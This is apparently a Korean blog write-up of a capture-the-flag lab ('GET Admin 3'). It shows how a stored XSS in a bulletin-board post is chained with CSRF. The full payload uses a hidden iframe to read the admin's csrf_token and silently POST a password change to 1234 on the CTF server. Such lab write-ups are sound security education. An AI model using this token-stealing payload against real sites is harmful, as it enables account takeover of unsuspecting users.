[CTF] GET Admin 3

CHIKA·2024년 7월 10일

CTF csrf

📌
CSRF (Cross Site Request Forgery) 란?
CSRF 공격 방법

1. mypage.php 확인

ID : xcvb , PW : xcvb 로 회원가입 후 로그인 - 마이페이지
추가 인증정보 입력 칸이 없는 것을 확인하고 비밀번호 변경 요청.

csrf_token 값이 함께 전송되고 있다.

mypage.php에 접속 시 csrf 토큰을 발행해주고 비밀번호를 변경하는 요청을 보낼 때 csrf 토큰을 함께 보냄으로써 사용자가 마이페이지에서 요청을 보내는지 확인하는 것 같다.

하지만 이렇게 만들면 XSS 취약점이 있을 시 csrf 토큰을 탈취할 수 있다.

2. Method 확인

POST요청을 change request해서 GET으로 보냈더니 에러가 발생함.
XSS 취약점을 찾아 csrf 토큰을 탈취 후 비밀번호 변경을 요청하게 만들어보자.

3. XSS 취약점 확인

회원가입 - 로그인 - 게시판 - 글쓰기 에서
특수문자 삽입가능 여부를 확인하기 위해 test<'"> 입력

HTML Entity로 치환되지 않음. XSS에 취약할 확률이 큼.

4. CSRF 공격

1) CSRF 토큰을 탈취하고 2) 이 토큰을 form 태그에 넣어보내자.
먼저 CSRF 토큰을 탈취하는 악성코드를 게시글에 삽입했다.

DOMData를 가져오기 위해 mypage.php 확인.
name = "csrf_token" 을 이용하자.

관리자가 해당 게시글을 클릭하게 유도한 후
CSRF토큰을 탈취하여 내 공격자 서버에 보낼 것이다.

그리고 탈취한 CSRF토큰을 value에 넣어 다른 게시글을 올리자.

해당 게시물 URL을 관리자 봇에게 보내면 관리자가 URL에 접속은 하지만 비밀번호 변경이 되지 않는다.
생각해보니 글을 두 개나 클릭해야 공격이 가능하다는건 좀 이상하다.

토큰 탈취와 비밀번호 변경요청(토큰값 포함)을 동시에 해야하는데 value에 탈취한 토큰값을 어떻게 넣지?

fetch를 이용하면 된다.

🔎 fetch 란?

웹 개발에서 자주 사용되는 JavaScript 함수로, 서버로 부터 리소스를 비동기적으로 가져올 때 사용함.
주로 네트워크 요청을 보내고 응답을 처리하기 위해 사용.
fetch('URL', {
  method: 'POST', // HTTP 메서드 지정
  headers: {
    'Content-Type': 'application/json' // 요청 헤더 설정
  },
  body: JSON.stringify({
    key1: 'value1',
    key2: 'value2'
  }) // 요청 본문 설정
})
  .then(response => response.json())
  .catch(error => console.error('Error:', error));
then : 'Promise'* 가 성공적으로 완료되었을 때 호출되는 메서드. 응답처리

catch : 'Promise' 가 실패했을 때 호출되는 메서드. 오류처리

Promise 란?
JavaScript에서 비동기 작업을 처리하기 위해 사용되는 객체.
현재는 알 수 없지만, 미래에 완료될 작업을 나타내며, 성공 또는 실패한 결과 값을 반환한다.

mypage_update.php의 헤더를 참고하여
아래의 코드를 게시글로 작성하자.

<!--post 요청을 보내기 위한 iframe-->
<iframe name="stealthFrame" style="display:none;"></iframe>
<!--csrf 토큰 탈취를 위한 iframe-->
<iframe src="http://ctf.segfaulthub.com:7575/csrf_3/mypage.php" 
        id="targetFrame" style="display:none;"></iframe>
<form method="POST" action="http://ctf.segfaulthub.com:7575/csrf_3/mypage_update.php" 
      id="myForm" target="stealthFrame">
    <!--변경할 비밀번호인 1234-->
    <input type= "hidden" name="pw" value="1234">
    <!-- csrf_token 값을 자바스크립트에서 설정할 예정 -->
    <input type= "hidden" name="csrf_token" id="csrf_token"> 
  
</form>

<script>
    // csrf_token 값을 가져오는 부분
    var targetTag = document.getElementById('targetFrame');
    targetTag.onload = function() {
    var DOMData = targetTag.contentDocument;
	var csrfToken = DOMData.getElementsByName('csrf_token')[0].value;
    document.getElementById('csrf_token').value = csrfToken; // 폼 필드에 csrf_token 값을 설정
        submitForm(); // 폼을 제출하는 함수 호출
    };

    function submitForm() {
        // fetch를 사용하여 폼 데이터를 서버로 전송
        fetch('http://ctf.segfaulthub.com:7575/csrf_3/mypage_update.php', {
            method: 'POST',
            headers: { // mypage_update.php의 헤더 가져오기
                'Host': 'ctf.segfaulthub.com:7575',
                'Content-Length': '69',
                'Cache-Control': 'max-age=0',
                'Accept-Language': 'ko-KR',
                'Upgrade-Insecure-Requests': '1',
                'Origin': 'http://ctf.segfaulthub.com:7575',
                'Content-Type': 'application/x-www-form-urlencoded',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
                'Referer': 'http://ctf.segfaulthub.com:7575/csrf_3/mypage.php',
                'Accept-Encoding': 'gzip, deflate, br'
            },
            body: new URLSearchParams(new FormData(document.getElementById('myForm'))).toString()
        })
        .then(response => response.json())
        .catch(error => console.error('Fetch error:', error));
    }
</script>